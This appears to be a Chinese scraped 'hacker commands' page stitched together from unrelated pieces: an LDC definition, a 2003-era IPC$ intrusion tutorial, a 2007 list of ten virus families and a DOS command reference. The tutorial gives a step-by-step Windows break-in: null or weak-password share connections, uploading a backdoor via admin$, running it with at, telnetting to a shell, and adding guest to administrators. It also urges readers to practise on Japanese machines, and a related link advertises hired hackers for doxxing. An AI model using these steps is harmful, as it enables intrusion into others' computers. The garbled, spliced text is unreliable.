黑客指令(黑客指令代码)

hacker1年前黑客资讯91

本文目录一览:

LDC什么意思及同义词

LDC

Least-developed country,不发达国家;欠发达国家。不发达国家或欠发达国家,又称发展中国家(developing country),是指政治上已独立,经济上比较贫穷,工业基础薄弱,人均国民生产总值较低的国家,绝大多数是第二次世界大战以后新独立的亚非拉国家,也包括东欧一些国家。

黑客DOS命令或其它命令入侵他人电脑的具体步骤?

IPC$入侵

一 唠叨一下:

网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.

不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于之一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).

因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!

二 什么是ipc$

IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。

我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程 *** 登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。

所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.

解惑:

1)IPC连接是Windows NT及以上系统中特有的远程 *** 登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。

也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)

2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接

3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表

三 建立ipc$连接在hack攻击中的作用

就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!

(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)

不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(

因此今后你更大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.

所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.

四 ipc$与空连接,139,445端口,默认共享的关系

以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)

1)ipc$与空连接:

不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.

许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).

2)ipc$与139,445端口:

ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.

3)ipc$与默认共享

默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)

五 ipc$连接失败的原因

以下5个原因是比较常见的:

1)你的系统不是NT或以上操作系统;

2)对方没有打开ipc$默认共享

3)对方未开启139或445端口(惑被防火墙屏蔽)

4)你的命令输入有误(比如缺少了空格等)

5)用户名或密码错误(空连接当然无所谓了)

另外,你也可以根据返回的错误号分析原因:

错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;

错误号51,Windows 无法找到 *** 路径 : *** 有问题;

错误号53,找不到 *** 路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);

错误号67,找不到 *** 名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;

错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。

错误号1326,未知的用户名或错误密码 : 原因很明显了;

错误号1792,试图登录,但是 *** 登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)

错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。

关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.

六 如何打开目标的IPC$(此段引自相关文章)

首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。

七 如何防范ipc$入侵

1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)

首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

2禁止默认共享

1)察看本地共享资源

运行-cmd-输入net share

2)删除共享(每次输入一个)

net share ipc$ /delete

net share admin$ /delete

net share c$ /delete

net share d$ /delete(如果有e,f,……可以继续删除)

3)停止server服务

net stop server /y (重新启动后server服务会重新开启)

4)修改注册表

运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。

如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务

控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用

4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师

5设置复杂密码,防止通过ipc$穷举密码

(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创)

八 相关命令

1)建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

3)映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)

如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4)删除一个ipc$连接

net use \\IP\ipc$ /del

5)删除共享映射

net use c: /del 删除映射的c盘,其他盘类推

net use * /del 删除全部,会有提示要求按y确认

九 经典入侵模式

这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以之一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3. C:\net time \\127.0.0.1

查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)

5. C:\net time \\127.0.0.1

再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:\WINNT\system32ntlm

输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

十 总结:

关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.

最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)

有关病毒的问题

2007年十大病毒档案,当前流行病毒多为他们的变种。

一、U盘寄生虫

病毒名称:Virus.Autorun.gr

中 文 名:"U盘寄生虫"变种gr

病毒长度:22096字节

病毒类型:蠕虫

危险级别:★★

影响平台:Win 9X/ME/NT/2000/XP/2003

Virus.Autorun “U盘寄生虫”是一个利用U盘等移动设备进行传播的蠕虫。“U

盘寄生虫”是针对autorun.inf这样的自动播放文件的蠕虫病毒。 autorun.inf文件

一般存在于U盘、MP3、移动硬盘和硬盘各个分区的根目录下,当用户双击U盘等设备

的时候,该文件就会利用Windows系统的自动播放功能优先运行autorun.inf文件,而

该文件就会立即执行所要加载的病毒程序,从而破坏用户计算机,使用户计算机遭受

损失。

专杀下载:

二、ARP病毒

病毒名称:“ARP”类病毒

病毒中文名:“ARP”类病毒

病毒类型:木马

危险级别:★★★

影响平台:Win 9X/ME/NT/2000/XP/2003

描述:ARP地址欺骗类病毒(以下简称ARP病毒)是一类特殊的病毒,该病毒一般

属于木马(Trojan)病毒,不具备主动传播的特性,不会自我复制。但是由于其发作的

时候会向全网发送伪造的ARP数据包,干扰全网的运行,因此它的危害比一些蠕虫还

要严重得多。通过伪造IP地址和MAC地址实现ARP欺骗,能够在 *** 中产生大量的ARP

通信量使 *** 阻塞或者实现“man in the middle” 进行ARP重定向和嗅探攻击。用

伪造源MAC地址发送ARP响应包,对ARP高速缓存机制的攻击。当局域网内某台主机运

行ARP欺骗的木马程序时,会欺骗局域网内所有主机和路由器,让所有上网的流量必

须经过病毒主机。其他用户原来直接通过路由器上网现在转由通过病毒主机上网,切

换的时候用户会断一次线。切换到病毒主机上网后,如果用户已经登陆了传奇服务器

,那么病毒主机就会经常伪造断线的假像,那么用户就得重新登录传奇服务器,这样

病毒主机就可以盗号了。

专杀下载:

三、网游大盗

病毒名称:Trojan/PSW.GamePass.jws

中 文 名:“网游大盗”变种jws

病毒长度:13739字节

病毒类型:木马

危害等级:★★

影响平台:Win 9X/ME/NT/2000/XP/2003

Trojan/PSW.GamePass.jws“网游大盗”变种jws是“网游大盗”木马家族最新变

种之一,采用Visual C++编写,并经过加壳处理。“网游大盗”变种jws运行后,会

将自我复制到Windows目录下,自我注册为“Windows_Down”系统服务,实现开机自

启。该病毒会盗取包括“传奇世界”、“魔兽世界”、“完美世界”、“征途”、“

武林外传”等多款网游玩家的帐户和密码,并且会下载其它病毒到本地运行。玩家计

算机一旦中毒,就可能导致游戏帐号、装备等丢失,给玩家带来损失。

专杀下载:

四、MSN性感相册

病毒名称:Worm/MSN.SendPhoto.a

中 文 名:性感相册

病毒类型:蠕虫

危害等级:★★

影响平台:Win 9X/ME/NT/2000/XP/2003

病毒运行特征:

该病毒运行时,会通过MSN即时聊天工具向MSN上的好友发送大小为479382 字节

的photos.zip 病毒包,该压缩包里面包含名为photos album-2007-5-26.scr病毒文

件,同时会随机向好友发送一些带有诱惑性的信息,如:“看看我的性感相片”,“

圣诞节快乐”等。

专杀下载:

l

五、ANI病毒

病毒名称:Exploit.ANIfile

病毒中文名:ANI病毒

病毒类型:蠕虫

危险级别:★★

影响平台:Windows 2000/XP/2003/Vista

描述:以Exploit.ANIfile.b为例,“ANI毒”变种b是一个利用微软Windows系统

ANI文件处理漏洞(MS07-017)进行传播的 *** 蠕虫。“ANI毒”变种b运行后,自我复

制到系统目录下。修改注册表,实现开机自启动。感染正常的可执行文件和本地网页

文件,并下载大量木马程序。感染本地磁盘和 *** 共享目录下的多种类型的网页文件

(包括*.HTML,*.ASPX,*.HTM,*.PHP,*. *** P,*.ASP),植入利用ANI文件处理漏

洞的恶意代码。自我复制到各逻辑盘根目录下,并创建autorun.inf自动播放配置文

件。双击盘符即可激活病毒,造成再次感染。修改hosts 文件,屏蔽多个网址,这些

网址大多是以前用来传播其它病毒的站点。另外,“ANI毒”变种b还可以利用自带的

*** TP引擎通过电子邮件进行传播。

专杀下载:

六、机器狗病毒

病毒名称:Trojan/Agent.pgz

中 文 名:机器狗

病毒类型:木马

危害等级:★★★

影响平台:Win 9X/ME/NT/2000/XP/2003

病毒运行特征:

“机器狗”病毒主要在网吧等使用系统还原软件以及硬盘还原卡的环境下发作。

病毒运行后,会在%WinDir%\System32 \drivers 目录下释放出一个名为pcihdd.sys

的驱动程序,该文件会接管冰点或者硬盘保护卡对硬盘的读写操作,这样该病毒就破

解了还原系统的保护,使冰点、硬盘保护卡实效。接着,该病毒会利用 MS06-014和

MS07-017系统漏洞和等多个应用软件漏洞,从***.com/ 、

***.biz/ 、***.com/ 等恶意网址下载多款网游木马,

盗取包括传奇、魔兽世界、征途、奇迹等多款网游帐号和密码,严重威胁游戏玩家数

字财产的安全。正因为还原软件和硬盘保护卡大多在网吧使用,因此网吧成为该病毒

发作的重灾区。

专杀下载:

七、 *** 木马

病毒名称:Trojan/Agent

病毒中文名: *** 木马

病毒类型:木马

危险级别:★★

影响平台:Win 9X/ME/NT/2000/XP/2003

描述:盗取用户机密信息,下载恶意程序。

“ *** 木马”及其变种是一个盗取用户计算机上机密信息的木马程序。“ *** 木

马”变种cfd运行后,自我复制到Windows目录下。修改注册表,实现开机自启。侦听

黑客指令,盗取用户计算机上的机密信息,并将机密信息发送到黑客指定的邮箱里。

“ *** 木马”会从网上下载大量的恶意程序,通过系统漏洞感染目标电脑,中毒电脑

可能会成为黑客操纵的“肉鸡”,严重威胁电脑中的数据安全。

专杀下载:

八、AV杀手

病毒名称:Trojan/KillAV.ak

中 文 名:“AV杀手”变种ak

病毒长度:19293字节

病毒类型:木马

危险级别:★★

影响平台:Win 9X/ME/NT/2000/XP/2003

Trojan/KillAV.ak“AV杀手”变种ak是“AV杀手”木马家族的最新成员之一,采

用Delphi语言编写,并经过加壳处理。 “AV杀手”变种ak运行后,自我修改文件属

性为“隐藏”。强行篡改注册表相关键值,致使文件夹选项中的“显示隐藏文件”功

能失效。利用Windows映像劫持技术(IFEO),修改注册表,致使许多与安全相关的

软件无法启动运行。在被感染计算机的后台调用系统“spoolsv.exe”进程,将恶意

代码注入其中并调用运行,隐藏自我,防止被查杀。在后台连接骇客指定远程服务器

站点,下载恶意程序并在被感染计算机上自动调用运行。在所有盘根目录下生成

“autorun.inf”文件(磁盘映像劫持文件)和病毒体文件,实现用户一双击盘符就

启动“AV杀手”变种ak运行的功能。

专杀下载:

九、Real脚本病毒

病毒名称:Exploit. *** .Real

中文名:Real脚本病毒

病毒长度:可变

类型:网页脚本

危害等级:★★★

影响平台: Windows98/2000/2003/xp

描述:Real脚本病毒是利用RealPlayer播放器ActiveX控件安全漏洞的恶意网页

脚本,常用于自动下载执行木马程序。病毒隐藏在Real格式的视频文件中,用户一旦

下载点击运行便会立刻中毒,许多热衷于网上下载视频文件的电脑用户因此中毒。

专杀下载:

十、熊猫烧香

病毒名称:Worm.WhBoy.h

中文名:“熊猫烧香”

病毒长度:可变

病毒类型:蠕虫

危害等级:★★★★

影响平台:Win9X/ME/NT/2000/XP/2003

以Worm.WhBoy.h为例,熊猫烧香是一个由Delphi工具编写的蠕虫病毒,能够终止

大量的反病毒软件和防火墙软件进程,病毒会删除扩展名为gho的文件,使用户无法

使用ghost软件恢复操作系统。“熊猫烧香”感染系统的*.exe、*.com、*.pif、

*.src、*.html、*.asp文件,添加病毒网址,导致用户一打开这些网页文件,IE就会

自动连接到指定的病毒网址中下载病毒。在硬盘各个分区下生成文件autorun.inf和

setup.exe.病毒还可以通过U盘和移动硬盘等方式进行传播,并且利用 Windows系统

的自动播放功能来运行。

“熊猫烧香”还可以修改注册表启动项,以使自身随操作系统同步运行。搜索硬

盘中的*.EXE可执行文件并感染文件,被感染的文件图标变成“熊猫烧香”的图案。

病毒还可以通过共享文件夹、系统弱口令等多种方式进行传播。

专杀下载:

补充:

这些流行病毒,如果不是最新变种各大杀毒软件都可以防护,所以最最管用的就是保

持杀毒软件病毒库最新,不推荐手动查杀。另外如果你不能不够你完成任务建议你补

充下面的内容

你google一下 最新病毒及清除 然后补充到上面应该就完美了。

欢迎访问我的空间

dos中可以输入的命令

分类: 电脑/ *** 操作系统/系统故障

问题描述:

dos中可以输入的命令?黑客命令也可?

解析:

DOS命令大全

一)MD——建立子目录

1.功能:创建新的子目录

2.类型:内部命令

3.格式:MD[盘符:][路径名]〈子目录名〉

4.使用说明:

(1)“盘符”:指定要建立子目录的磁盘驱动器字母,若省略,则为当前驱动器;

(2)“路径名”:要建立的子目录的上级目录名,若缺省则建在当前目录下。

例:(1)在C盘的根目录下创建名为FOX的子目录;(2)在FOX子目录下再创建USER子目录。

C:、>MD FOX (在当前驱动器C盘下创建子目录FOX)

C:、>MD FOX 、USER (在FOX 子目录下再创建USER子目录)

(二)CD——改变当前目录

1.功能:显示当前目录

2.类型:内部命令

3.格式:CD[盘符:][路径名][子目录名]

4.使用说明:

(1)如果省略路径和子目录名则显示当前目录;

(2)如采用“CD、”格式,则退回到根目录;

(3)如采用“CD.。”格式则退回到上一级目录。

例:(1)进入到USER子目录;(2)从USER子目录退回到子目录;(3)返回到根目录。

C:、>CD FOX 、USER(进入FOX子目录下的USER子目录)

C:、FOX、USER>CD.。 (退回上一级根目录)

C:、FOX>CD、 (返回到根目录)

C:、>

(三)RD——删除子目录命令

1.功能:从指定的磁盘删除了目录。

2.类型:内部命令

3.格式:RD[盘符:][路径名][子目录名]

4.使用说明:

(1)子目录在删除前必须是空的,也就是说需要先进入该子目录,使用DEL(删除文件的命令)将其子目录下的文件删空,然后再退回到上一级目录,用RD命令删除该了目录本身;

(2)不能删除根目录和当前目录。

例:要求把C盘FOX子目录下的USER子目录删除,操作如下:

之一步:先将USER子目录下的文件删空;

C、>DEL C:、FOX、USER、*。*

第二步,删除USER子目录。

C、>RD C:、FOX、USER

(四)DIR——显示磁盘目录命令

1.功能:显示磁盘目录的内容。

2.类型:内部命令

3.格式:DIR [盘符][路径][/P][/W]

4.

使用说明:/P的使用;当欲查看的目录太多,无法在一屏显示完屏幕会一直往上卷,不容易看清,加上/P参数后,屏幕上会分面一次显示23行的文件信息,然后暂停,并提示;Press

any key to continue

/W的使用:加上/W只显示文件名,至于文件大小及建立的日期和时间则都省略。加上参数后,每行可以显示五个文件名。

PATH——路径设置命令

1.功能:设备可执行文件的搜索路径,只对文件有效。

2.类型:内部命令

3.格式:PATH[盘符1]目录[路径名1]{[;盘符2:],〈目录路径名2〉…}

4.使用说明:

(1)当运行一个可执行文件时,DOS会先在当前目录中搜索该文件,若找到则运行之;若找不到该文件,则根据PATH命令所设置的路径,顺序逐条地到目录中搜索该文件;

(2)PATH命令中的路径,若有两条以上,各路径之间以一个分号“;”隔开;

(3)PATH命令有三种使用 *** :

PATH[盘符1:][路径1][盘符2:][路径2]…(设定可执行文件的搜索路径) PATH:(取消所有路径)

PATH:(显示目前所设的路径)

-----------------------------

DOs命令大全:

有关某个命令的详细信息,请键入 HELP 命令名

ASSOC 显示或修改文件扩展名关联。

AT 计划在计算机上运行的命令和程序。

ATTRIB 显示或更改文件属性。

BREAK 设置或清除扩展式 CTRL+C 检查。

CACLS 显示或修改文件的访问控制列表(ACLs)。

CALL 从另一个批处理程序调用这一个。

CD 显示当前目录的名称或将其更改。

CHCP 显示或设置活动代码页数。

CHDIR 显示当前目录的名称或将其更改。

CHKDSK 检查磁盘并显示状态报告。

CHKNTFS 显示或修改启动时间磁盘检查。

CLS 清除屏幕。

CMD 打开另一个 Windows 命令解释程序窗口。

COLOR 设置默认控制台前景和背景颜色。

COMP 比较两个或两套文件的内容。

COMPACT 显示或更改 NTFS 分区上文件的压缩。

CONVERT 将 FAT 卷转换成 NTFS。您不能转换

当前驱动器。

COPY 将至少一个文件复制到另一个位置。

DATE 显示或设置日期。

DEL 删除至少一个文件。

DIR 显示一个目录中的文件和子目录。

DISKCOMP 比较两个软盘的内容。

DISKCOPY 将一个软盘的内容复制到另一个软盘。

DOSKEY 编辑命令行、调用 Windows 命令并创建宏。

ECHO 显示消息,或将命令回显打开或关上。

ENDLOCAL 结束批文件中环境更改的本地化。

ERASE 删除至少一个文件。

EXIT 退出 CMD.EXE 程序(命令解释程序)。

FC 比较两个或两套文件,并显示

不同处。

FIND 在文件中搜索文字字符串。

FINDSTR 在文件中搜索字符串。

FOR 为一套文件中的每个文件运行一个指定的命令。

FORMAT 格式化磁盘,以便跟 Windows 使用。

FTYPE 显示或修改用于文件扩展名关联的文件类型。

GOTO 将 Windows 命令解释程序指向批处理程序

中某个标明的行。

GRAFTABL 启用 Windows 来以图像模式显示

扩展字符集。

HELP 提供 Windows 命令的帮助信息。

IF 执行批处理程序中的条件性处理。

LABEL 创建、更改或删除磁盘的卷标。

MD 创建目录。

MKDIR 创建目录。

MODE 配置系统设备。

MORE 一次显示一个结果屏幕。

MOVE 将文件从一个目录移到另一个目录。

PATH 显示或设置可执行文件的搜索路径。

PAUSE 暂停批文件的处理并显示消息。

POPD 还原 PUSHD 保存的当前目录的上一个值。

PRINT 打印文本文件。

PROMPT 更改 Windows 命令提示符。

PUSHD 保存当前目录,然后对其进行更改。

RD 删除目录。

RECOVER 从有问题的磁盘恢复可读信息。

REM 记录批文件或 CONFIG.SYS 中的注释。

REN 重命名文件。

RENAME 重命名文件。

REPLACE 替换文件。

RMDIR 删除目录。

SET 显示、设置或删除 Windows 环境变量。

SETLOCAL 开始批文件中环境更改的本地化。

SHIFT 更换批文件中可替换参数的位置。

SORT 对输入进行分类。

START 启动另一个窗口来运行指定的程序或命令。

SUBST 将路径跟一个驱动器号关联。

TIME 显示或设置系统时间。

TITLE 设置 CMD.EXE 会话的窗口标题。

TREE 以图形模式显示驱动器或路径的目录结构。

TYPE 显示文本文件的内容。

VER 显示 Windows 版本。

VERIFY 告诉 Windows 是否验证文件是否已正确

写入磁盘。

VOL 显示磁盘卷标和序列号。

XCOPY 复制文件和目录树。

标签: 黑客指令

相关文章

请黑客人肉多少钱(人肉多少钱一斤)-怎么找黑客大户

请黑客人肉多少钱(人肉多少钱一斤)-怎么找黑客大户

请黑客人肉多少钱(人肉多少钱一斤)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑客业务...

新疆新增3例本土确诊病例-新疆新增3例冠状是哪个地方

新疆新增3例本土确诊病例-新疆新增3例冠状是哪个地方

要说到最近国内疫情哪个地方最受关注,那一定是新疆疫情了根据新疆卫健委最新报道显示,新疆新增3例本土确诊病例,这3例病例均来自喀什疏附县和克州阿克陶县,虽然目前新疆无症状感染者会带来传播风险,但是依然能...

影响基金理财的消息有这些

周三了,诸位早上好。前自感电动势缩量下跌反跳的推断获得认证,下面便是填满不明的下自感电动势了。今日的行情会很重要,它决策了下面二天我们是否可以使再次躺赚。好啦,话不多说,一起来看下今日早评有什么关键...

微信分付怎么开通

分付可否启用是系统软件评定的結果,没法人工控制。因为微信分付处在产品测试,若在微信零钱中未表明通道得话可事后注意。 知名品牌型号规格:华为公司P40 系统软件:EMUI11.0.0 软件版本:微信7....

黑客勒索需要借助病毒吗(勒索病毒的攻击后果)

黑客勒索需要借助病毒吗(勒索病毒的攻击后果)

本文导读目录: 1、比特币勒索病毒是通过什么来传播的 2、勒索病毒是怎么传播 勒索病毒怎么回事介绍 3、1分钟看懂勒索病毒,勒索病毒通过什么途径传播 4、电脑被黑客勒索病毒怎么办 5、...

门上被写了数字4(门边上被写数字)

门上被写了数字4(门边上被写数字)

本文目录一览: 1、门牌号4 不吉利 2、带4的门牌号是不是不好啊 3、既然4这个数字对中国人来说不吉利,为什么中国的门牌号有4号门牌? 4、门牌号带4是不吉利的吗?怎么办才好呢???...